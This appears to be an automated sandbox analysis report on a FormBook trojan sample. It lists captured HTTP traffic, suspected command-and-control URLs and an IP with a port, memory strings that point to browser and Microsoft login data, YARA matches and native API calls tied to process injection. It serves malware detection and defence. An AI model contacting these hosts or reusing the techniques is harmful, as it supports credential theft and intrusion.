            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:06:59 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:07:02 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:07:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68129128605vary: Accept-Encoding,Acceptx-frame-options: DENYx-shopid: 68129128605x-shardid: 156content-language: en-INx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:51 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:51 GMT; SameSite=Laxset-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:51 GMT; SameSite=Laxset-cookie: _shopify_y=2a006b9e-2410-43a9-ad69-41888273dea8; Expires=Thu, 09-Oct-25 12:07:51 GMT; Domain=zingara.life; Path=/; SameSite=Laxset-cookie: _shopify_s=25a32db8-d952-465f-870e-9f90c6ffc1bd; Expires=Wed, 09-Oct-24Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:07:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68129128605vary: Accept-Encoding,Acceptx-frame-options: DENYx-shopid: 68129128605x-shardid: 156content-language: en-INx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:53 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:53 GMT; SameSite=Laxset-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:54 GMT; SameSite=Laxset-cookie: _shopify_y=f1994b7a-4418-4777-9882-f971f0cbd2e4; Expires=Thu, 09-Oct-25 12:07:54 GMT; Domain=zingara.life; Path=/; SameSite=Laxset-cookie: _shopify_s=8e62383f-c62d-45d6-a9c4-12d0e528e322; Expires=Wed, 09-Oct-24Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:07:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68129128605vary: Accept-Encoding,Acceptx-frame-options: DENYx-shopid: 68129128605x-shardid: 156content-language: en-INx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:56 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:56 GMT; SameSite=Laxset-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:56 GMT; SameSite=Laxset-cookie: _shopify_y=8a594a9b-e5d6-46f6-b3bc-dacfbc7bea45; Expires=Thu, 09-Oct-25 12:07:56 GMT; Domain=zingara.life; Path=/; SameSite=Laxset-cookie: _shopify_s=022fb35b-4924-43c4-88bf-911b01658e63; Expires=Wed, 09-Oct-24Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:08:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:08:42 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:08:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: typeperf.exe, 0000000C.00000002.3739193871.0000000003E38000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3740970787.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003098000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://156.226.108.99:28888/
            Source: uxEGEjhWYrJv.exe, 0000000E.00000002.3739752184.0000000004E1B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.allthingsjasmin.com
            Source: uxEGEjhWYrJv.exe, 0000000E.00000002.3739752184.0000000004E1B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.allthingsjasmin.com/eysm/
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: typeperf.exe, 0000000C.00000002.3730128385.000000000099F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: typeperf.exe, 0000000C.00000003.1871640910.0000000007AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: typeperf.exe, 0000000C.00000002.3739193871.0000000004AC8000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3740970787.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: typeperf.exe, 0000000C.00000002.3739193871.0000000004936000.00000004.10000000.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003B96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zingara.life/s7qk?ZZY=iaY

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042C723 NtClose,9_2_0042C723
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C735C0 NtCreateMutant,LdrInitializeThunk,9_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72B60 NtClose,LdrInitializeThunk,9_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C74340 NtSetContextThread,9_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C73090 NtSetValueKey,9_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C73010 NtOpenDirectoryObject,9_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C74650 NtSuspendThread,9_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72BE0 NtQueryValueKey,9_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72BF0 NtAllocateVirtualMemory,9_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72B80 NtQueryInformationFile,9_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72BA0 NtEnumerateValueKey,9_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72AD0 NtReadFile,9_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72AF0 NtWriteFile,9_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72AB0 NtWaitForSingleObject,9_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C739B0 NtGetContextThread,9_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72FE0 NtCreateFile,9_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72F90 NtProtectVirtualMemory,9_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72FA0 NtQuerySection,9_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72FB0 NtResumeThread,9_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72F60 NtCreateProcessEx,9_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72F30 NtCreateSection,9_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72EE0 NtQueueApcThread,9_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72E80 NtReadVirtualMemory,9_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72EA0 NtAdjustPrivilegesToken,9_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72E30 NtWriteVirtualMemory,9_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72DD0 NtDelayExecution,9_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72DB0 NtEnumerateKey,9_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C73D70 NtOpenThread,9_2_03C73D70
